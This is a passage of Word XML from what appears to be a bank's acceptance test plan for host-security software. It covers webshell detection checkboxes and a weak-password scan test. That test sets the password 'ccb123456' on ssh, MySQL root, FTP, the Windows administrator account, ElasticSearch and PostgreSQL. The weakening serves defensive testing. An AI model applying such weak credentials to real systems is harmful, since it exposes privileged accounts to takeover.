              </w:rPr>
              <w:t xml:space="preserve">      </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Tahoma" w:hAnsi="Tahoma" w:eastAsia="宋体" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>口</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:eastAsia="宋体" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Tahoma" w:hAnsi="Tahoma" w:eastAsia="宋体" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>通过</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:eastAsia="宋体" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve">   </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Tahoma" w:hAnsi="Tahoma" w:eastAsia="宋体" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>口</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:eastAsia="宋体" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Tahoma" w:hAnsi="Tahoma" w:eastAsia="宋体" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>未通过</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:eastAsia="宋体" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve">  </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Tahoma" w:hAnsi="Tahoma" w:eastAsia="宋体" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>口</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:eastAsia="宋体" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Tahoma" w:hAnsi="Tahoma" w:eastAsia="宋体" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>未测试</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:eastAsia="宋体" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Tahoma" w:hAnsi="Tahoma" w:eastAsia="宋体" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve">webshell检出率90%-95%  </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:eastAsia="宋体" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve">     </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Tahoma" w:hAnsi="Tahoma" w:eastAsia="宋体" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>口</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:eastAsia="宋体" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Tahoma" w:hAnsi="Tahoma" w:eastAsia="宋体" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>通过</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:eastAsia="宋体" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve">   </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Tahoma" w:hAnsi="Tahoma" w:eastAsia="宋体" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>口</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:eastAsia="宋体" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Tahoma" w:hAnsi="Tahoma" w:eastAsia="宋体" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>未通过</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:eastAsia="宋体" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve">  </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Tahoma" w:hAnsi="Tahoma" w:eastAsia="宋体" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>口</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:eastAsia="宋体" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Tahoma" w:hAnsi="Tahoma" w:eastAsia="宋体" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>未测试</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:eastAsia="宋体" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Tahoma" w:hAnsi="Tahoma" w:eastAsia="宋体" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve">webshell检出率80%-90%  </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:eastAsia="宋体" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve">     </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Tahoma" w:hAnsi="Tahoma" w:eastAsia="宋体" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>口</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:eastAsia="宋体" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Tahoma" w:hAnsi="Tahoma" w:eastAsia="宋体" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>通过</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:eastAsia="宋体" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve">   </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Tahoma" w:hAnsi="Tahoma" w:eastAsia="宋体" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>口</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:eastAsia="宋体" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Tahoma" w:hAnsi="Tahoma" w:eastAsia="宋体" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>未通过</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:eastAsia="宋体" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve">  </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Tahoma" w:hAnsi="Tahoma" w:eastAsia="宋体" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>口</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:eastAsia="宋体" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Tahoma" w:hAnsi="Tahoma" w:eastAsia="宋体" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>未测试</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:widowControl/>
              <w:spacing w:after="200"/>
              <w:textAlignment w:val="top"/>
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:eastAsia="宋体" w:cs="宋体"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Tahoma" w:hAnsi="Tahoma" w:eastAsia="宋体" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve">webshell检出率80%以下   </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:eastAsia="宋体" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve">      </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Tahoma" w:hAnsi="Tahoma" w:eastAsia="宋体" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>口</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:eastAsia="宋体" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Tahoma" w:hAnsi="Tahoma" w:eastAsia="宋体" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>通过</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:eastAsia="宋体" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve">   </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Tahoma" w:hAnsi="Tahoma" w:eastAsia="宋体" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>口</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:eastAsia="宋体" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Tahoma" w:hAnsi="Tahoma" w:eastAsia="宋体" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>未通过</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:eastAsia="宋体" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve">  </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Tahoma" w:hAnsi="Tahoma" w:eastAsia="宋体" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>口</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:eastAsia="宋体" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Tahoma" w:hAnsi="Tahoma" w:eastAsia="宋体" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>未测试</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:widowControl/>
              <w:spacing w:after="200"/>
              <w:textAlignment w:val="top"/>
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:eastAsia="宋体" w:cs="宋体"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:eastAsia="宋体" w:cs="宋体"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>支持webshell自动隔离</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Tahoma" w:hAnsi="Tahoma" w:eastAsia="宋体" w:cs="宋体"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t xml:space="preserve">     </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:eastAsia="宋体" w:cs="宋体"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t xml:space="preserve">       </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Tahoma" w:hAnsi="Tahoma" w:eastAsia="宋体" w:cs="宋体"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>口</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:eastAsia="Tahoma" w:cs="Times New Roman"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Tahoma" w:hAnsi="Tahoma" w:eastAsia="宋体" w:cs="宋体"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>通过</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:eastAsia="Tahoma" w:cs="Times New Roman"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t xml:space="preserve">   </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Tahoma" w:hAnsi="Tahoma" w:eastAsia="宋体" w:cs="宋体"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>口</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:eastAsia="Tahoma" w:cs="Times New Roman"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Tahoma" w:hAnsi="Tahoma" w:eastAsia="宋体" w:cs="宋体"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>未通过</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:eastAsia="Tahoma" w:cs="Times New Roman"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t xml:space="preserve">  </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Tahoma" w:hAnsi="Tahoma" w:eastAsia="宋体" w:cs="宋体"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>口</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:eastAsia="Tahoma" w:cs="Times New Roman"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Tahoma" w:hAnsi="Tahoma" w:eastAsia="宋体" w:cs="宋体"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>未测试</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:widowControl/>
              <w:spacing w:after="200"/>
              <w:textAlignment w:val="top"/>
              <w:rPr>
                <w:rFonts w:eastAsia="宋体" w:cs="Times New Roman" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:eastAsia="宋体" w:cs="宋体"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>支持检测规则的可信度配置</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Tahoma" w:hAnsi="Tahoma" w:eastAsia="宋体" w:cs="宋体"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t xml:space="preserve">  口</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:eastAsia="Tahoma" w:cs="Times New Roman"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Tahoma" w:hAnsi="Tahoma" w:eastAsia="宋体" w:cs="宋体"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>通过</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:eastAsia="Tahoma" w:cs="Times New Roman"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t xml:space="preserve">   </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Tahoma" w:hAnsi="Tahoma" w:eastAsia="宋体" w:cs="宋体"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>口</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:eastAsia="Tahoma" w:cs="Times New Roman"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Tahoma" w:hAnsi="Tahoma" w:eastAsia="宋体" w:cs="宋体"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>未通过</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:eastAsia="Tahoma" w:cs="Times New Roman"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t xml:space="preserve">  </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Tahoma" w:hAnsi="Tahoma" w:eastAsia="宋体" w:cs="宋体"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>口</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:eastAsia="Tahoma" w:cs="Times New Roman"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Tahoma" w:hAnsi="Tahoma" w:eastAsia="宋体" w:cs="宋体"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>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备注</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="777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人员签字</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7776" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="72"/>
              <w:rPr>
                <w:rFonts w:eastAsia="宋体"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:eastAsia="宋体"/>
                <w:kern w:val="0"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>建行:</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:eastAsia="宋体"/>
                <w:kern w:val="0"/>
                <w:sz w:val="20"/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t xml:space="preserve">             </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:eastAsia="宋体"/>
                <w:kern w:val="0"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">     厂商：</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:eastAsia="宋体"/>
                <w:kern w:val="0"/>
                <w:sz w:val="20"/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t xml:space="preserve">             </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:bookmarkStart w:id="97" w:name="_Toc31799"/>
      <w:bookmarkStart w:id="98" w:name="_Toc1892612346"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>弱口令检查</w:t>
      </w:r>
      <w:bookmarkEnd w:id="97"/>
      <w:bookmarkEnd w:id="98"/>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弱口令检查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能够检查出主机上部署软件所存在的弱口令，软件包括ssh、MySQL、FTP、rdp、ElasticSearch、PostgreSQL等。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pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="44"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:t>主机操作系统到服务端网络访问关系通畅</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>；</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="44"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>主机上正确安装ssh、MySQL、FTP、rdp、ElasticSearch、PostgreSQL应用</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="44"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>在服务端对弱口令库新增ccb123456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1"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17"/>
              </w:numPr>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>测试主机上设置弱密码</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="50"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>ssh</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>：passwd ccb 根据提示修改ssh密码为ccb123456</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="50"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Mysql</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>：登录mysql;</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="50"/>
              <w:ind w:firstLine="630" w:firstLineChars="300"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>执行use mysql;</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="50"/>
              <w:ind w:firstLine="630" w:firstLineChars="300"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>执行update user set password=password(</w:t>
            </w:r>
            <w:r>
              <w:t>‘</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>ccb123456</w:t>
            </w:r>
            <w:r>
              <w:t>’</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>) where user=</w:t>
            </w:r>
            <w:r>
              <w:t>’root’</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>;</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="50"/>
              <w:ind w:firstLine="630" w:firstLineChars="300"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>执行flush privileges;</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="50"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">      执行quit</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="50"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>ftp</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>：通过passwd 修改redhat-67-02机器上的ftp登录用户test</w:t>
            </w:r>
            <w:r>
              <w:t>ftp</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>的密码为ccb123456</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="50"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Rdp</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>:打开cmd，执行net user administrator * ，根据提示修改密码为ccb123456</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="50"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>ElasticSearch</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>：curl -H "Content-Type:application/json" -XPOST -u elastic 'http://127.0.0.1:9200/_xpack/security/user/elastic/_password' -d '{ "password" : "ccb123456" }'</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="50"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>PostgreSQL</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>：使用psql，连接到Postgres Server，执行alter user postgres with password ‘ccb123456’</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="50"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="17"/>
              </w:numPr>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>登录服务端，对主机进行弱口令检查</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="50"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="17"/>
              </w:numPr>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>等待扫描结束，查看结果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能够检查出主机上部署软件所存在的弱口令，ssh、MySQL、FTP、【Windows】rdp、ElasticSearch、PostgreSQL这些软件的若口均为ccb123456</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支持检测ssh弱口令       </w:t>
            </w:r>
            <w:r>
              <w:rPr>
